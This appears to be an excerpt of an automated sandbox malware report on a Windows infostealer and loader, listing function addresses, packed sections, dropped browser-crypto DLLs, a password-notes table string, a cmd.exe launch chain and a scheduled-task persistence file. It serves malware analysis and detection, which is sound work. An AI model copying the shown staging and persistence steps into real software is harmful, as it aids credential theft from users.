Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CA1B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1B8C0 rand_s,NtQueryVirtualMemory,	0_2_6CA1B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CA1B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C9BF280

Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B35A0	0_2_6C9B35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA134A0	0_2_6CA134A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1C4A0	0_2_6CA1C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C6C80	0_2_6C9C6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9DD4D0	0_2_6C9DD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C64C0	0_2_6C9C64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F6CF0	0_2_6C9F6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BD4E0	0_2_6C9BD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2542B	0_2_6CA2542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F5C10	0_2_6C9F5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2AC00	0_2_6CA2AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA02C10	0_2_6CA02C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C5440	0_2_6C9C5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2545C	0_2_6CA2545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F0DD0	0_2_6C9F0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA185F0	0_2_6CA185F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9E0512	0_2_6C9E0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9DED10	0_2_6C9DED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CFD00	0_2_6C9CFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA14EA0	0_2_6CA14EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D5E90	0_2_6C9D5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA1E680	0_2_6CA1E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA276E3	0_2_6CA276E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BBEF0	0_2_6C9BBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CFEF0	0_2_6C9CFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F7E10	0_2_6C9F7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA19E30	0_2_6CA19E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA05600	0_2_6CA05600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA26E63	0_2_6CA26E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D9E50	0_2_6C9D9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F3E50	0_2_6C9F3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D4640	0_2_6C9D4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BC670	0_2_6C9BC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA02E4E	0_2_6CA02E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA077A0	0_2_6CA077A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9E6FF0	0_2_6C9E6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BDFE0	0_2_6C9BDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F7710	0_2_6C9F7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C9F00	0_2_6C9C9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9E60A0	0_2_6C9E60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA250C7	0_2_6CA250C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9DC0E0	0_2_6C9DC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F58E0	0_2_6C9F58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA04820	0_2_6CA04820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C7810	0_2_6C9C7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9FB820	0_2_6C9FB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D8850	0_2_6C9D8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9DD850	0_2_6C9DD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9FF070	0_2_6C9FF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F5190	0_2_6C9F5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9ED9B0	0_2_6C9ED9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA12990	0_2_6CA12990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BC9A0	0_2_6C9BC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0B970	0_2_6CA0B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2B170	0_2_6CA2B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9DA940	0_2_6C9DA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CD960	0_2_6C9CD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA22AB0	0_2_6CA22AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CCAB0	0_2_6C9CCAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2BA90	0_2_6CA2BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B22A0	0_2_6C9B22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9E4AA0	0_2_6C9E4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F8AC0	0_2_6C9F8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D1AF0	0_2_6C9D1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9FE2F0	0_2_6C9FE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F9A60	0_2_6C9F9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BF380	0_2_6C9BF380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA253C8	0_2_6CA253C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9FD320	0_2_6C9FD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B5340	0_2_6C9B5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CC370	0_2_6C9CC370
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009B4CD0	14_2_009B4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009F3048	14_2_009F3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009E7D63	14_2_009E7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009B4AD0	14_2_009B4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009F6EE9	14_2_009F6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009F763B	14_2_009F763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009F2BB0	14_2_009F2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009F8700	14_2_009F8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 14_2_009F775B	14_2_009F775B

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9ECBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9F94D0 appears 90 times

Source: file.exe, 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2653332055.000000006CC35000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2623849094.000000000178E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9997141768292683
Source: file.exe	Static PE information: Section: ZLIB complexity 0.99517822265625
Source: file.exe	Static PE information: Section: ZLIB complexity 0.9893798828125
Source: BAFIEGIECG.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9981589395491803
Source: BAFIEGIECG.exe.0.dr	Static PE information: Section: gxzeqrwn ZLIB complexity 0.9946359619212621
Source: amadka[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9981589395491803
Source: amadka[1].exe.0.dr	Static PE information: Section: gxzeqrwn ZLIB complexity 0.9946359619212621
Source: explorti.exe.10.dr	Static PE information: Section: ZLIB complexity 0.9981589395491803
Source: explorti.exe.10.dr	Static PE information: Section: gxzeqrwn ZLIB complexity 0.9946359619212621
Source: random[1].exe.14.dr	Static PE information: Section: ZLIB complexity 0.9997141768292683
Source: random[1].exe.14.dr	Static PE information: Section: ZLIB complexity 0.99517822265625
Source: random[1].exe.14.dr	Static PE information: Section: ZLIB complexity 0.9893798828125
Source: 7873c16243.exe.14.dr	Static PE information: Section: ZLIB complexity 0.9997141768292683
Source: 7873c16243.exe.14.dr	Static PE information: Section: ZLIB complexity 0.99517822265625
Source: 7873c16243.exe.14.dr	Static PE information: Section: ZLIB complexity 0.9893798828125

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/30@2/3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CA17030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2509936329.0000000022CC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2493464108.0000000022CD4000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr, EBGDAAKJJDAAKFHJKJKF.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2652435287.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 45%

Source: BAFIEGIECG.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
